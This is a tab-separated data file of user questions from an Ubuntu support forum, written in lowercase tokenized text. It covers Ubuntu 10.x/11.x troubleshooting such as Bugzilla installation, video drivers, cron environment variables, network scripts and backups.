62216	bugzilla is not running as expected	after an isntallation of bugzilla , and after several answers answered bugzilla is not running - access forbidden http : //askubuntu.com/questions/61935/how-do-i-install-bugzilla how to launch bugzilla after installation ? when i go to the http : //localhost/bubzilla i do not get the bugzilla application , but rather a list of files ( directory browsing ) what am i missing please ? add i want to add that for every file trying to click , i get : file not found error .
62221	how to solve this error : there is no perl module on cpan named [ modulename ]	i am trying to install bugzilla optional modules , but get this error : i tried using cpan module : :mod_perl2 but with no success as well . please advise
62231	how to install java ee in ubuntu 11.04 properly ?	i am totally new to ubuntu and just installed it for the first time . i am trying to install java ee in my ubuntu . i downloaded it from oracle website and its an .sh file . i followed instructions from this website on how to run .sh files : http : //ma65p.wordpress.com/2008/08/03/how-to-deal-with-sh-files-in-ubuntu/ . whenever i hit enter in the terminal it says : could not locate a suitable jar utility . please ensure that you have java 6 or newer installed on your system and accessible in your path or by setting java_home . please help ...
62234	move & resize extended linux partition	currently i am dual booting windows 7 and ubuntu natty and now i had decided to ditch windows 7 for good . when i launch disk utility , below are my current partition layout : my question is : how should i move the ubuntu partition ahead and make it primary os after deleting windows 7 partition and the rest of dell junk without lost of data** ? ** backup will always be done prior
62239	does the nokia ovi suite work ?	please tell whether nokia ovi suite works on ubuntu . i searched a lot not but have not been able to find the answer . if not please provide me with some other alternative .
62245	difference between medibuntu end multiverse repository ?	what are the differences of the packages : libavcodec-extra-52 , libavformat-extra-52 , libavdevice-extra-52 , libswscale-extra-0 in the medibuntu and multiverse repository ?
62246	why do *nix folk like to use `` ... '' rather than the `` character ?	at the risk of being flamed , i 'd like to understand why some people prefer to use a `` construction '' of accent and single quote characters rather than the `` double-quote '' character when quoting things ? example : why do some users write quotes using `` weird '' quotes ? this is not command-line wizardry ; i see this in written texts that are intended for humans to read . here 's an example i could quickly dig up . i find this construction ugly because it 's asymmetrical , and because it abuses typographical characters for a purpose they were n't meant for . for some reason , this use of characters is mostly ( exclusively ? ) done by linux ( ( la ) tex ? ) users and not by the average computer user . if the intention is to create “curly quotes” then i do n't get why only the opening quote is made `` curly '' using the grave accent ( ` ) -- why is a plain apostrophe used for closing quotes , rather than the acute accent ( ´ ) which would make the whole thing symmetrical ? if the intention is to create “curly quotes” then why are actual curly quotes ( as created by ms word ) frowned upon ? modern computer systems handle actual curly quotes well , so it ca n't simply be a tradition from the gopher days , can it ? why are two single characters used even though the same can be achieved with a single character ?
62247	crosspaltformui problem with mts mblaze	i have tried to install mts mblaze in my karmic koala . but it failed . when i am trying to use synaptic manger it says that software index is broken . so i am unable to do any updates . i have already tried dpkg with pure and remove . also tried : $ sudo apt-get -f it always say that some package is partially installed ( crossplatformui ) is there any way to remove this manually ?
62249	how do you change brightness , color and sharpness from command line ?	i am controlling my pc with ssh and scripting . how can i change the brightness , color and sharpness from command line ? try 1 : failed $ sudo redshift -t 5000:5000 -g .5 can not list gnome panel applets . initialization of gnome-clock failed . trying next provider ... latitude and longitude must be set . try 2 : failed $ cat brightness 20 $ cat max_brightness 20 $ echo 1 | sudo tee /sys/class/backlight/acpi_video0/brightness 1 $ echo 20 | sudo tee /sys/class/backlight/acpi_video0/brightness any alternative way to do ? follow up : http : //jonls.dk/redshift/ [ command ] [ 1000k to 10000k ] [ effects 0.1 to 10.0 ] | | / / / ^ ^ ^ ^ ^ redshift -t 1000:1000 -l 0:0 -g .1 ; dark redshift -t 1000:1000 -l 0.0 -g 5 ; bright
62251	how to enable 2d acceleration ( preferably using proprietary graphics driver ) on 32bit pae kernel ?	i recently switched from the generic 32bit kernel to the pae kernel thus enabling 10gib instead of 3 . after switching i noticed a different gui behavior : when moving windows , i get ~3 redraws per second . with the non-pae kernel i use the proprietary amd/ati driver giving a nice 2d performance . since i use this machine also as desktop , full 2d support is required . 3d would be nice . if possible , i 'd use the proprietary driver . moving to 64bit is not an option ( i use a multiboot system and already have a working 64bit os ) . how to achieve full 2d acceleration with pae ?
62253	how to stream multiple videos from one source ?	are there any way to stream multiple videos from one source ? currently i use vlc to stream one video file across lan network . i wanted to add multiple playlist of videos and stream them one after another .
62256	buying a videocard : do amd cards support hardware acceleration on ubuntu ?	i am buying a new video card and am now doubting between amd and nvidia . as i wo n't be upgrading my processor and mainboard atm , but i want to play some bluray movies i think it is necessary that the video card can use hardware acceleration on ubuntu . with nvidia there is support as is for example demonstrated here with the libvdpau1 driver . does similar things/drivers exist for the high-end amd video cards like a hd6950 ? ( note that i personally do not require an open source driver . if a binary driver will work , that is okay for me )
62258	trouble with bash and crontab	i 'm migrating some scripts from an older machine to a lucid ec2 machine . i 'm sourcing a file in our ~/.bashrc and setting some environment variables , but those variables do n't seem to be accessible from any cron . even though my cron has a . /home/username/.bashrc & & /path/to/script the script does n't seem to know of any of the environment variables which is in another file and sourced in ~/.bashrc . all of these scripts work successfully when i run them from the command line . while trying to run it from a crontab , however , they fail .
62272	memory seems to be leaking ?	my memory is filling slowly . i have 2gb of ram , if i start the system 30 % are used by apps . now after some days it says 90 % are used by apps . i know that linux is using as much as possible but its getting really slowly if the 90 % are reached . and i dont know who is using it ... .my top command shows 21 1 1260m 266m 9792 s 5 13.3 0:24.52 java 20 0 47160 308 276 s 0 0.0 1:05.65 udisks-daemon 20 0 324m 16m 4808 s 0 0.8 1:10.92 gnome-terminal 20 0 740m 15m 5996 s 0 0.8 7:41.15 soffice.bin 21 1 804m 191m 38m s 0 9.6 0:24.22 firefox-bin 20 0 19392 1392 956 r 0 0.1 0:00.02 top 20 0 23900 988 416 s 0 0.0 0:03.76 init any ideas ? memory leak ?
62273	at3iont3-i boot from usb	i 'm trying to get my htpc i 've built to run ubuntu . for some reason , when i try to boot from usb i get this weird graphical error . tweaking the bios a little more tells me that it ca n't find anything to boot off from my usb drive . i 've followed the instructions on ubuntu.com ( for mac ) when you download an iso . here 's a video of what i 'm doing : http : //vimeo.com/29318791 edit : i now have ubuntu booting from a harddrive after a cd install . however , now i get dropped into initramfs , and get lots of these : ata2 : comreset failed ( errno=16 ) what now ?
62278	what is the correct value for ldapbinddn in bugzilla ldap integration ?	i have a new bugzilla installation , and trying to connect it to my ldap server . ca n't seem to make it work . what is the correct value of this field : ldapbinddn should be ? i am able to bind with ldap browser with the user : company\administrator password so i tried the value as : cn=administrator ; cn=company_users ; dc=company : password i get the error : failed to bind to the ldap server . the error message was : 80090308 thanks
62280	how to get a driver for an intel 82852/855gm ?	my niece 's laptop had ubuntu 9.04 and supported this video card perfectly , compiz effects , games , movies , everything ... , but she wanted iphone support so i installed the new ubuntu 11.04 , but for my surprise the video card is not supported , no compiz effects , and it 's using the vesa drivers . i was trying to find a way to use the intel drivers and have all the effects running again . i found and follow some tutorials , installed patched drivers and create a xorg.conf to use the intel drivers but its very unstable and buggy , so i do n't know what i 'm doing wrong , i hope someone can help me resolve this .
62287	which program will handle the desktop in gnome 3 ?	in gnome 3 , will nautilus still be used to handle the desktop , or will it be some component of gnome shell or something ? if one decides to not use gnome shell , how will the desktop be displayed ?
62288	why do i need to run source command for making .bash_profile alias available ?	my .bash_profile is like below : alias l='ls -l' alias p='pwd' alias sites='cd /home/caveman/sites' alias time_card='cd /home/caveman/sites/time-card/time-card' alias ping='ping google.com' alias bash_profile='gedit /home/caveman/.bash_profile' alias webroot='cd /var/www' every time i log into my machine i need to run the source .bash_profile to make all the alias available . can you guys figure out where is the problem is ?
62290	how do i list installed software with the installed size ?	i would like to have a list the installed software on my machine , with the disk space consumed by them alongside . i would prefer to be able to order by largest/smallest , but that is not a necessity . i am the sort of person who will install software to try it , and never clean up after myself . as a result , my 7gb ( windows and my data are on separate partitions , as well as a swap area ) ubuntu 11.04 partition is suffering , and has started regularly showing warning messages . i have cleaned my browser cache , as well as everything under package cleaner in ubuntu tweak , and am left with 149.81 mb off free space .
62295	how to fix a comreset failed error ?	after a new install on my newly-built htpc , i ca n't boot ! i end up in initramfs every time , and get lots of ata2 : comreset failed ( errno=16 ) full error here : ata2.00 exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen ata2.00 : cmd a0/01:00:00:60:00/00:00:00:00:00/a0 tag 0 dma 96 in res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x4 ( timeout ) ata2.00 : status : { drdy } ata2.00 : comreset failed ( errno=16 ) the machine : board : asus at3iont-i duluxe 2gigs of ocz ram 80gb western digital laptop harddrive ubuntu 11.04 minimal more details : i 've done multiple re-installs i 've done a disk check i 've done a cpu check i 've done a memory check i 've filled the first and last million bytes with zeros using ultimate boot cd checked sata ports are enabled tried raid , sata , and ahci modes tried all new sata cables . tried booting arch from a usb - similar error : [ sda ] no caching mode page present and error : boot device did n't show up after 30 seconds , then chucked into initramfs . help ?
62300	how do i install wunderlist ?	wunderlist is a todo list , and apparently they now have linux support . how do i install it ?
62308	not able to setup delete and backspace compatibility in terminal	i installed ubuntu 11.04 and i use the terminal a lot . so , i need to setup the terminal 's compatibility to exactly as the delete and backspace keys should work . please tell me what settings should be done .
62315	lost wireless mouse connection when laptop is on battery	i just bought a hp wireless mouse , but i 'm having some issues . the cursor frequently becomes non-responsive to mouse movements . i noticed that it only happens on my laptop when it is running off the battery and whenever the mouse is n't moved for say 20-30 seconds , i then have to touch the laptops touch-pad to get the mouse to reconnect . so it looks like it maybe power-management is interfering but i 'm not really sure how to troubleshoot this . edit : an important piece of info which i completely forgot mention is that i did n't have this problem with my previous sweex mi420 wireless mouse . $ dmesg |grep -i mouse : [ 1.279240 ] mousedev : ps/2 mouse device common for all mice [ 2.205885 ] input : hp hp wireless laser comfort mouse as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.0/input/input5 [ 2.206071 ] generic-usb 0003:03f0:8501.0001 : input , hiddev0 , hidraw0 : usb hid v1.11 mouse [ hp hp wireless laser comfort mouse ] on usb-0000:00:1a.0-1.2/input0 $ ls /sys/bus/usb/devices : 1-0:1.0 1-1 1-1.1 1-1:1.0 1-1.1:1.0 1-1.1:1.1 1-1.2 1-1.2:1.0 2-0:1.0 2-1 2-1:1.0 usb1 usb2
62316	how to troubleshoot photo import failure with shotwell ?	i ca n't get shotwell to import my photos . they are all normal jpeg files from digital cameras , about ten thousand in total . how to i continue troubleshooting this , and get all my photos back into shotwell ? i exported them from within shotwell to a backup drive , prior to reinstalling ubuntu 11.04 . the export settings were : current format , original size , and export metadata selected . after exporting , i verified the files were all present , batch renamed them all with pyrename , and then opened a few at random to test . now i 've reinstalled and it 's time to put them all back . i am having no luck at all . the only clue i have is the following error message in the ~/.cache/shotwell log : [ wrn ] no namespace info available for xmp prefix `lr' i can open the files now after the reinstall , with eye of gnome . i can even import them into f-spot , complete with tags and full exif data . everything seems normal about the files , except they wo n't import into shotwell . i tried the default version of shotwell , then the yorba ppa ( 0.11.1 version ) , neither will import . they chug away , i hear the hard drive activity for a while , then i get a 'no photos or videos imported ' message . if this is the wrong place for this question can anyone suggest a better place to post it ? yorba 's wiki & list of bugs did not give me any meaningful search results . i 've got a second backup of the images prior to all this , but they are untagged and unsorted . did i just waste a week tagging and sorting all my photos for nothing ?
62319	is there an equivalent to win-p ( switch video output hotkey ) ?	i have a laptop with multiple outputs and use an external monitor pretty often . if i want to activate it , i have to go to system menu -- > displays and activate the external display . after using , i need to deactivate it with the same menu . in windows , i could do the same by simply pressing win+p ( meta+p ) . is there any hotkey or other way to achieve this behaviour in unity ( ubuntu 11.04/11.10 ) ? on a side-note , my laptop does have a button to switch output modes , but does not work ( just opens the unity menu bar - i suspect it 's a shortcut for meta+p internally ) . addendum : the laptop in question is a dell studio xps 1640 . addendum 2 : i 've did some more research . xev gives me the following statement when pressing the `` change crt/lcd '' -button : keymapnotify event , serial 33 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 in tty1 , the command showkey gives me the following output : key 125 pressed key 25 pressed key 25 released key 125 released key 28 pressed alternative output via showkey -s : 0xe0 0x5b 0x19 0x99 0xe0 0xdb 0x1c the last line takes a second to show - i guess it refers to the enter-key . a quick look into dumpkeys|grep ^keycode reveals 125=alt and 25=p . looking in /lib/udev/keymaps/dell , the code for switching the video mode is set to 0x9b : 0x9b switchvideomode # display toggle button now , from what i see , the display-button is not mapped to a single key but to a key burst ... any idea how to tackle the problem further is greatly appreciated .
62322	bcm 4313 lan driver must be removed and activated everytime ubuntu starts	i got my bcm 4314 lan in my toshiba satellite to work by removing the sta broadcom proprietary driver and then activating it . this has to be done every time ubuntu is started . is there a way to get wireless to work each time ubuntu starts without going through that process each time ?
62323	how can i connect to pppoe over wifi ? ( english/espa単ol )	in english* : hello good start this topic because i have a big problem in ubuntu 11.04 , i realize that does not support pppoe wifi my wifi connection uses double dialing to connect to wifi as i have to log into my account , and ubuntu pppoe does not support that kind of connection . it would be good to add support for that . to be clear , i do not speak english well , because i do not understand much of it ( my native language is spanish ) . en espa単ol : hola bueno inicio este tema porque tengo un gran problema en ubuntu 11.04 , me doy cuenta que no tiene soporte para wifi pppoe , mi conexion wifi usa doble marcado osea para conectarme al wifi igual tengo que conectarme a mi cuenta pppoe y ubuntu o cualquier distrobucion de linux no tiene soporte para ese tipo de conexion seria bueno que agregaran soporte para eso , aclaro que yo no ablo en ingles por si no me entienden mucho mi idioma nativo es el espa単ol . * please answer in english .
62327	why does wow create a desktop icon when i run the launcher ?	i 'm running ubuntu 10.10 x64 and have installed world of warcraft using wine . absolutely everything about the game 's install went perfectly , and everything works exactly as it should ( even the one minor detail that winehq 's appdb listed about the launcher not being able to actually start the game works as expected ) . here 's my one minor annoyance : when i run the launcher it will place a shortcut on my desktop that itself starts the launcher . i 'd really rather this not happen , how can i prevent it from doing so ?
62328	1st time install of ubuntu as dual boot on my win 7 notebook now grub error ?	novice here , and i just installed ubuntu as dual boot . now i just get the `` rescue grub error '' and cant run either windows or ubuntu . i have no idea what to do despite reading the post here as some are complex . can someone please help ?
62331	how to properly install nautilus-script-collection-svn ?	i'me relatively new to development on linux , and i need svn . i 've installed subversion , but command-line interface seems too creepy , so i 've googled nautilus-script-collection-svn i 've installed that too , but i cant't find it anywhere . is that supposed to integrate into context menu ? if yes , why ca n't i see it ?
62334	back up folder > 4.7gb to dvds	i have a folder of about 20gb that i 'd like to back up . it 's the .raw files of photos i took last year , so it 's not a folder that will change , so incremental backups is n't an issue . all i 'd like is a simple way to back up the folder to a number of dvds . what program is best for this sort of task ? a lot of the backup programs seem to be more about incremental backups and so forth , which i 'm not interested in . i 'd like the program to automatically break down the folder into chunks that can be written to dvd .
62335	how can i tell if i installed with wubi ?	it sounds odd , but i really can not remember how i installed my ubuntu . what i am sure is , i had windows 7 installed on the laptop in the very beginning , then i installed ubuntu so that this is a dual system 1 year ago . i need to know if the ubuntu was installed with wubi or not , because it determines how i could resize the partition of ubuntu ... could anyone help ? thank you very much !
62340	how to copy an ubuntu install from one laptop to another	i am going to change my machine : from a laptop with ubuntu to another laptop where i am going to install ubuntu ... i am quite happy with the current system , what i am afraid of is having to rebuild everything from 0 . so what do people often do to clone an ubuntu system ? that may include the data , packages , shortcut settings , etc ...
62350	why does aide use all my memory and swap when running ?	i have a linux server running on a linode.com vps , where i 'm trying to utilize aide to detect any issues . however , the nightly aide run uses up all of my available memory and swap ( 512mb ram / 384mb swap ) . i 've tried adding a script to /etc/cron.daily that would stop/start services using a lot of memory ( apache2 , mysql ) during the aide run . unfortunately , it seems like aide continued to use every available byte ( including the space freed up from apache2 and mysql ) . here 's a graph from munin showing what happens when aide runs : note the spike of memory usage , well into swap , when aide runs any suggestions on tuning aide to not use so much memory , or is there an alternative to aide that does n't behave this way ?
62354	reassign keyboard shortcuts for unity `` launcher '' ?	how can i reassign the keyboard shortcuts for the unity `` launcher '' ( in ubuntu 11.10beta1 ) by default , the applications in the launcher are assigned super-1 , super-2 , etc . i would like to use those key combinations for more common activities , and so would like to set the launcher to use shift-super-1 , etc . i can not find any configuration setting in unity or the compiz settings manager .
62355	why is it necessary to add locally attached printers ?	i seldom have to print anything on paper anymore , so my knowledge about printers is really limited . last weekend , i demoed oneiric to my father , who still prints stuff , and even though his printer is attached using usb , i had to select the printer from a list . why is that ? i mean , if i attach a memory stick , i do n't have to select it . it just works . why is that no so with printers ? for network printers , i understand why they have to be added , since a company can have thousands of printers when one user only needs to use a couple of them . but should n't directly connected printers just work ?
62362	puppet server can not find certificate request when importing certificate	i am trying to install puppet server and client in two ubuntu 10.04. one ubuntu server which has puppet master and ubuntu client which has puppet client . **i referred the below link for installation** installing and configuring puppet i dont have a dns server so i had added host entry in both server and client . when i am importing certificate sudo puppetca -- sign meercat02.example.com i am getting error err could not call sign could not find certificate request
62363	how to install rpm with dependences	i 've an .rpm file that i need to install on ubuntu 11.04 x64 bits on my core i5 laptop ( it is actually some device driver ) . i 've tried to convert it using alien but reports an error for me stating that : drm-kmp-pae-2.6.37_2.6.32.27_0.2-0.5.1.i586.rpm is for architecture i386 ; the package can not be built on this system . i 've downloaded rpm tool but when i try to install it it says that there are many dependencies required ! so , how can i install this rpm and in the same time got the dependencies resolved for me ? edit : here 's the original problem : http : //superuser.com/questions/338047/my-hp-probook-4530s-got-much-heater-with-ubuntu-linux-than-windows-7
62366	networkmanager - if-down.d script does not execute	i am trying to use /etc/network/if-up.d/ and /etc/network/if-down.d to send an sms from my computer to my phone via gmail whenever my computer enters or exits a wireless network . the main script is written in perl , and the scripts in said folders are essentially wrappers around it . here is the perl script , ~user/bin/laptopsms.pl : # ! /usr/bin/perl use strict ; use warnings ; use email : :send ; use email : :send : :gmail ; use email : :simple : :creator ; my $ addy = q { myemail @ gmail.com } ; my $ pass = q { mypass } ; my $ sms = q { myphonenumber @ tmomail.net } ; my $ email = email : :simple- > create ( header = > [ from = > $ addy , to = > $ sms , subject = > `` $ argv [ 0 ] '' , ] , body = > `` $ argv [ 1 ] / $ argv [ 2 ] '' , ) ; my $ sender = email : :send- > new ( { mailer = > 'gmail ' , mailer_args = > [ username = > $ addy , password = > $ pass , ] } ) ; eval { $ sender- > send ( $ email ) } ; die `` error sending email : $ @ '' if $ @ ; the following script is /etc/network/if-up.d/99postconnect_laptopsms : # ! /bin/bash set -e if [ `` $ iface '' == `` wlan0 '' ] ; then ipaddr=`ip addr | grep inet [ ^6 ] | grep -v 127.0.0.1 | awk { 'print $ 2 ' } | sed 's ! / [ 0-9 ] * ! ! g'` ssid=`iwgetid -r` ~user/bin/laptopsms.pl `` connected '' `` $ ssid '' `` $ ipaddr '' fi this works fine , and i get a text message whenever my phone enters a network ; the corresponding if-down.d script to send a `` disconnect '' signal , however , does not : # ! /bin/bash set -e if [ `` $ iface '' == `` wlan0 '' ] ; then ~user/bin/laptopsms.pl `` disconnect '' `` disconnect '' `` disconnect '' fi this is not executing ; i tried to put the following snippet into the script to see if anything is actually running : ifdowntest=/home/user/ifdown_test.txt date > > $ ifdowntest whoami > > $ ifdowntest ifconfig > > $ ifdowntest sleep 5 leaving this in the script by itself executes just fine , but appending it to the wrapper to the perl script does not . ( no file is generated . ) the output of ifconfig > > $ ifdowntest shows that wlan0 does not have an ip - it 's been taken down . can i get this script to execute pre-down ( i thought that 's what the if-down.d folder did ) or somehow edit something to make this work ? note that it takes about 3 seconds for the perl script to fire when running it manually . fwiw : i 'm taking down the network manually by clicking the networkmanager applet and clicking `` disconnect '' . i could potentially just kill my router to test that too , but i do n't know if there 's a difference between manually disconnecting and the ap no longer existing .
62378	dual boot ubuntu 11.04 and fedora 15	i want make dual boot with feodra 15 and ubuntu 11.04 for testing features , please guide me the same . i had done dual boot with windows and linux but not linux linux .
62381	network manager stops working after an update to ca-certificates	fresh beta install on aspire 5741 ( new70 ) - network ok after installation , run update ( 485 updates ) - install completes ok after update and reboot , network manager fails to open . unable to connect to lan . though my hardware , both wlan and lan , are still recognised , however network icon disappears from taskbar , and i am unable to launch nm-applet both from menu and terminal . error `` missing folder '' in terminal tried both the amd64 and i386 versions . ubuntu 10.10 runs fine on laptop .
62384	nvidia-96 drivers causing garbled text , display on geforce4 ti 4660	i have a sony vaio desktop ( pcv rz221 ) which runs windows xp . i installed ubuntu on a separate partition . the install runs fine but the graphics runs on fallback drivers even though it has a nvidia geforce ti 4660 graphics card installed . i have tried installing the nvidia drivers ( nvidia-96 ) which were recommended by the 'additional drivers ' application . this results in complete garbled text and video . everything turns white once i restart the system after installing the nvidia drivers . the nouveau drivers do not work etiher . i have tried three different versions of ubuntu ( 10.10 , 11.04 and 11.10 ) and all of them have the same issue . below is the technical information of the motherborad technical platform architecture sis 651 cpu section processor name intel速 pentium速 4 processor processor manufacturer intel processor speed ( mhz ) 3060 model 3.06 ghz type pentium iv l2 cache ( kb ) 512 graphics graphic card name nvidia geforce4 ti4600 total graphics memory ( mb ) 128
62386	how to run a cron job that relies on .xauthority ?	i want to take a screenshot every five minutes with 'scrot ' . to do this over a ssh connection , i can either run ssh -x user @ server while true ; do scrot -z ; sleep 300 ; done or ( after manually check of folder name in /var/run/gdm/auth-for-xxx-yyy/database ) ssh user @ server export display=:0 export xauthority=/var/run/gdm/auth-for-user-wum1sv/database while true ; do scrot -z ; sleep 300 ; done but if i want to do this as a cron job , i will automatically need to map the environment variable xauthority to the random folder in /var/run/gdm/ . according to this post how do i create the .xauthority file ? this mapping is done automatically , but that is not the case for cron jobs i guess and apparently not for ssh sessions if x forwarding is not used . does anyone have a suggestion on how to create this cron job ?
62390	why is kde not the default desktop ?	i 'm just wondering why kde was not made the default desktop ? like the decisions and reason why gnome was used instead . i personally feel kde is superior to gnome and it 's partial-fork , unity . i 'd also like to know why kubuntu lacks the software centre , ubuntu one , the icons and theme of ubuntu . and why kubuntu comes with silly apps as default . lacking firefox , pidgin etc : p
62394	how to enable smtp with authentication in bugzilla 4	i have installed bugzilla 4.0 . it 's working , however , i am not able to use the feature to send with smtp with uthentication . according to the release notes , if you install : authen : :sasl the smtp : :tls should be available in the mail drop down . running ./checksetup -- check-modules : checking perl modules ... checking for cgi.pm ( v3.51 ) ok : found v3.52 checking for digest-sha ( any ) ok : found v5.47 checking for timedate ( v2.21 ) ok : found v2.23 checking for datetime ( v0.28 ) ok : found v0.70 checking for datetime-timezone ( v0.71 ) ok : found v1.38 checking for dbi ( v1.41 ) ok : found v1.609 checking for template-toolkit ( v2.22 ) ok : found v2.22 checking for email-send ( v2.00 ) ok : found v2.198 checking for email-mime ( v1.904 ) ok : found v1.910 checking for uri ( any ) ok : found v1.52 checking for list-moreutils ( v0.22 ) ok : found v0.33 checking available perl dbd modules ... checking for dbd-pg ( v1.45 ) not found checking for dbd-mysql ( v4.00 ) ok : found v4.012 checking for dbd-oracle ( v1.19 ) not found the following perl modules are optional : checking for gd ( v1.20 ) ok : found v2.39 checking for chart ( v2.1 ) ok : found v2.4.1 checking for template-gd ( any ) ok : found v1.56 checking for gdtextutil ( any ) ok : found v0.86 checking for gdgraph ( any ) ok : found v1.44 checking for xml-twig ( any ) ok : found v3.32 checking for mime-tools ( v5.406 ) ok : found v5.502 checking for libwww-perl ( any ) ok : found v5.834 checking for patchreader ( v0.9.4 ) ok : found v0.9.6 checking for perl-ldap ( any ) ok : found v0.43 checking for authen-sasl ( any ) ok : found v2.15 checking for radiusperl ( any ) ok : found v0.20 checking for soap-lite ( v0.712 ) ok : found v0.714 checking for json-rpc ( any ) ok : found v0.96 checking for json-xs ( v2.0 ) ok : found v2.32 checking for test-taint ( any ) ok : found v1.04 checking for html-parser ( v3.40 ) ok : found v3.64 checking for html-scrubber ( any ) ok : found v0.09 checking for email-mime-attachment-stripper ( any ) ok : found v1.316 checking for email-reply ( any ) ok : found v1.202 checking for theschwartz ( any ) ok : found v1.10 checking for daemon-generic ( any ) ok : found v0.81 checking for mod_perl ( v1.999022 ) ok : found v2.000004 checking for apache-sizelimit ( v0.93 ) ok : found v0.95 checking for math-random-secure ( v0.05 ) ok : found v0.06 warning : we could not check the configuration of apache . this sometimes happens when you are not running checksetup.pl as root . to see the problem we ran into , run : /usr/sbin/apache2 -t -d dump_modules the module is installed checking for authen-sasl ( any ) ok : found v2.15 however , in the parameters- > email - i do not see smtp : tls available . i have installed also the following : sudo apt-get install libnet-ssleay-perl sudo apt-get install libcrypt-ssleay-perl as well as : cpan : install net : :smtp : :tls i do n't think any code changes needed in order for this to work , but who knows . according to q/a http : //serverfault.com/questions/83113/bugzilla-mail-delivery-method-using-tls-for-gmail i added the line use email : :send : :smtp : :tls ; to mailer.pm file . that caused a problem software error : > ca n't locate email/send/smtp/tls.pm in @ inc ( @ inc contains : . > lib/i686-linux-gnu-thread-multi lib /etc/perl > /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 > /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 > /usr/local/lib/site_perl ) at bugzilla/mailer.pm line 48 . begin > failed -- compilation aborted at bugzilla/mailer.pm line 48 . compilation > failed in require at bugzilla/auth.pm line 35 . begin > failed -- compilation aborted at bugzilla/auth.pm line 35 . compilation > failed in require at bugzilla.pm line 40 . begin failed -- compilation > aborted at bugzilla.pm line 40 . compilation failed in require at > /var/www/bugzilla/editparams.cgi line 28 . begin failed -- compilation > aborted at /var/www/bugzilla/editparams.cgi line 28 . for help , please > send mail to the webmaster ( webmaster @ localhost ) , giving this error > message and the time and date of the error . please advise . *to note that yesterday i had a feeling that i do n't have bugzilla 4.0 installed : - ) anyway , i checked , and it is 4 .
62398	how do i deploy firefox bookmarks for all users in network ?	i have a bash-script for installing firefox which is downloaded and executed from every client workstation in the network . the script is on the server and all workstations are running ubuntu . now i want all workstations to have some default predefined bookmarks like company website etc . there is a way to do that by modifying the omni.jar file which is in the installation folder of firefox but i could not find a working solution to do that . how can i provide some bookmarks for all users ?
62399	take screenshot of terminal	i 'm using gnome2 . i have on my first workspace two terminals open ( gnome-terminal ) . i want a screenshot of the whole terminal1 window . i do n't want set up the bounding box of the screenshot with my mouse , or pointing with it that window . how i can do that from the console on terminal2 ?
62405	how to remove transparency in kde without disabling all desktop effects ?	i do n't understand the hype for transparency . from a usability standpoint i see no argument whatsoever that transparency should enhance your productivity or improve your workflow . any element on top of another one is inevitabily more ditracting and takes longer to grasp than a single clean and well designed element . true , it 's much more complex to design consistent and meaningful elements , panels , symbols and windows without any transparency . still i want to remove transparency from kde 4.7 without disabling desktop effects alltogether . since i do n't find an opaque theme i would like to use ( hints are welcome ! ) i want to disable the transparency within existing themes . how to do that ? thx for reading , p .
62408	presets missing on a aficio mp c6501	at the printer company instructions installed new driver . now the preset gives no option for single page with staple . it requires several clicks to the `` finishing '' to set for stapling . anybody else having this problem and is there a fix ? only preset options is `` basic ( with no staple ) , 2 sided , 2 sided with staple , and landscape . occasionally there appears and `` unregistered '' option . is it possible to change the default on the unregistered option ?
62410	ubuntu will not shutdown	i have installed ubuntu as wubi ( next to windows 7 ) . when i expect the computer to shut down , it does n't , it freezes instead . i 've found this elsewhere : sudo modprobe -rf rt2860sta ; sudo modprobe rt2860sta ; echo blacklist rt2800pci | sudo tee -a /etc/modprobe.d/blacklist.conf is there some way for me to figure out , whether this is right for me ? this fixes `` wrong driver loaded '' , but how can i check which driver i have , and whether it is wrong ?
62411	`` cat : write error : file too large '' when trying to join 7gb backup	i have a 7gb .iso file , and i want to move it to a secondary hdd i have connected on my computer , first i tried to move the entire file and it failed saying the file was too large . i noticed always 4gb was copied , so i used split to generate 3gb chunks . now i have the 3 chunks in the secondary disk , and i am trying to join them using cat with : '' cat x0* > backup.iso '' but it also fails saying : `` cat : write error : file too large '' , the resulting file is once again 4gb . how can i join these files ? i have plenty of space on that disk for the files ( > 50gb ) . i read somewhere that i should `` pipe '' the files contents in real time to avoid this error but i have no idea how to do it .
62414	it 's possible to change preview size in thunar ?	i like thunar but i would like to change its maximum and unsettable preview size . by default use a dimension of about 64x64 and i would prefer to use a size of 128x128 . i think it 's possible to do it in some way , but i do n't know how .
62415	why does ubuntu one address book not work in evolution ?	i have troubles getting my ubuntu one contacts into evolution . i have set up everything one the u1 dashboard , but when selecting this address book in evolution i get a message telling me that it could not display this address book because of an invalid url or due the inviability of the server . next to details , it mentions that it has an invalid source . ( can not replicate the original message since it 's in dutch ... ) when i check the status on u1 , it says that there are problems regarding the contacts , but this was on 26/08 . so i assume this would be solved by now , or is it ? could someone tell me how to get things work please ?
62416	network icon disappeared , no more internet	so , everything was working absolutely fine since alpha 2 for me . now yesterday only , i closed the lid of my laptop and i believe it did a so-called `` bad shutdown '' . when i started it again this morning , the network icon was n't in the top panel anymore and i ca n't connect to the internet ( obviously ) . google chrome seems to be enable to start up too . i tried a few things suggested here but none worked ... edit : this worked for me : sudo apt-get install -- reinstall libnss3 : i386 libnss3
62421	eclipse content-assist popup is unreadable on ambiance/radiance theme	i use ubuntu 10.10 and installed the eclipse indigo from the official eclipse website . it 's a java editor ( not cdt ) and characters on the content assist popup are not readable . is there any solution ?
62423	libreoffice crashes too often ?	libreoffice crashes too often , here is the version that i 'm using : libreoffice 3.3.3 ooo330m19 ( build:301 ) tag libreoffice-3.3.3.1 , ubuntu package 1:3.3.3-1ubuntu2 edit : how it got crashed . i '' m currently running chrome browser with minimum 7+ tabs and a terminal plus a vlc video streaming and also a update manager was running in the background . whenever i edit something in libreoffice , it crashes up randomly . now i 'm not able to reproduce it . but it happens randomly . is it because i sometimes close the laptop lid . edit version 2 : here are few related queries posted in libreoffice : http : //listarchives.libreoffice.org/global/users/msg02500.html http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=621501 i normally use touchpad for cursor movement and also use right-clicks more often while doing spell-check .
